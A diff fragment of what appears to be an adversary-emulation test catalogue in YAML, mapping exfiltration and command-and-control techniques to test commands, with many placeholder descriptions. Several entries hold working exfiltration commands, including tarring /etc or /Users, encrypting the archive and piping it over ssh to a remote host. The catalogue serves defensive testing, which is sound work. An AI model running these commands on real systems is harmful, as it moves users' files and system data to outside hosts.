description: 'Use import command to collect a full desktop screenshot
'
supported_platforms:
- linux
input_arguments:
output_file:
description: |
xxx
description: 'xxx
'
type: Path
default: desktop.png
executor:
@@ -15863,8 +16493,9 @@ exfiltration:
identifier: T1002
atomic_tests:
- name: Compress Data for Exfiltration With PowerShell
description: |
TODO
description: 'TODO
'
supported_platforms:
- windows
input_arguments:
@@ -15878,11 +16509,13 @@ exfiltration:
default: C:\test\Data.zip
executor:
name: powershell
command: |
dir #{input_file} -Recurse | Compress-Archive -DestinationPath #{output_file}
command: 'dir #{input_file} -Recurse | Compress-Archive -DestinationPath #{output_file}
'
- name: Compress Data for Exfiltration With Rar
description: |
TODO
description: 'TODO
'
supported_platforms:
- windows
input_arguments:
@@ -15896,11 +16529,13 @@ exfiltration:
default: exfilthis.rar
executor:
name: command_prompt
command: |
rar a -r #{output_file} #{input_file}
command: 'rar a -r #{output_file} #{input_file}
'
- name: Data Compressed - nix
description: |
TODO
description: 'TODO
'
supported_platforms:
- linux
- macos
@@ -15978,8 +16613,9 @@ exfiltration:
identifier: T1022
atomic_tests:
- name: Data Encrypted
description: |
TODO
description: 'TODO
'
supported_platforms:
- macos
- centos
@@ -16040,8 +16676,9 @@ exfiltration:
identifier: T1030
atomic_tests:
- name: Data Transfer Size Limits
description: |
Take a file/directory, split it into 5Mb chunks
description: 'Take a file/directory, split it into 5Mb chunks
'
supported_platforms:
- macos
- centos
@@ -16129,8 +16766,9 @@ exfiltration:
default: atomic
executor:
name: sh
command: |
ssh #{domain} "(cd /etc && tar -zcvf - *)" > ./etc.tar.gz
command: 'ssh #{domain} "(cd /etc && tar -zcvf - *)" > ./etc.tar.gz
'
- name: Exfiltration Over Alternative Protocol - SSH
description: |
Input a domain and test Exfiltration over SSH
@@ -16143,11 +16781,15 @@ exfiltration:
- linux
executor:
name: sh
command: |
tar czpf - /Users/* | openssl des3 -salt -pass #{password} | ssh #{user_name}@#{domain} 'cat > /Users.tar.gz.enc'
command: 'tar czpf - /Users/* | openssl des3 -salt -pass #{password} | ssh
#{user_name}@#{domain} ''cat > /Users.tar.gz.enc''
'
- name: Exfiltration Over Alternative Protocol - HTTP
description: |
A firewall rule (iptables or firewalld) will be needed to allow exfiltration on port 1337.
description: 'A firewall rule (iptables or firewalld) will be needed to allow
exfiltration on port 1337.
'
supported_platforms:
- macos
- centos
@@ -16295,8 +16937,9 @@ command-and-control:
identifier: T1132
atomic_tests:
- name: Base64 Encoded data.
description: |
Utilizing a common technique for posting base64 encoded data.
description: 'Utilizing a common technique for posting base64 encoded data.
'
supported_platforms:
- macos
- linux
@@ -16370,8 +17013,9 @@ command-and-control:
identifier: T1105
atomic_tests:
- name: xxxx
description: |
xxxx
description: 'xxxx
'
supported_platforms:
- linux
- macos
@@ -16454,8 +17098,9 @@ command-and-control:
identifier: T1065
atomic_tests:
- name: Testing usage of uncommonly used port with PowerShell
description: |
Testing uncommonly used port utilizing PowerShell
description: 'Testing uncommonly used port utilizing PowerShell
'
supported_platforms:
- windows
input_arguments:
@@ -16469,11 +17114,13 @@ command-and-control:
default: google.com
executor:
name: powershell
command: |
test-netconnection -ComputerName #{domain} -port #{port}
command: 'test-netconnection -ComputerName #{domain} -port #{port}
'
- name: Testing usage of uncommonly used port
description: |
Testing uncommonly used port utilizing telnet.
description: 'Testing uncommonly used port utilizing telnet.
'
supported_platforms:
- linux
- macos
@@ -16488,8 +17135,9 @@ command-and-control:
default: google.com
executor:
name: sh
command: |
telnet #{domain} #{port}
command: 'telnet #{domain} #{port}
'
initial-access:
'':
technique: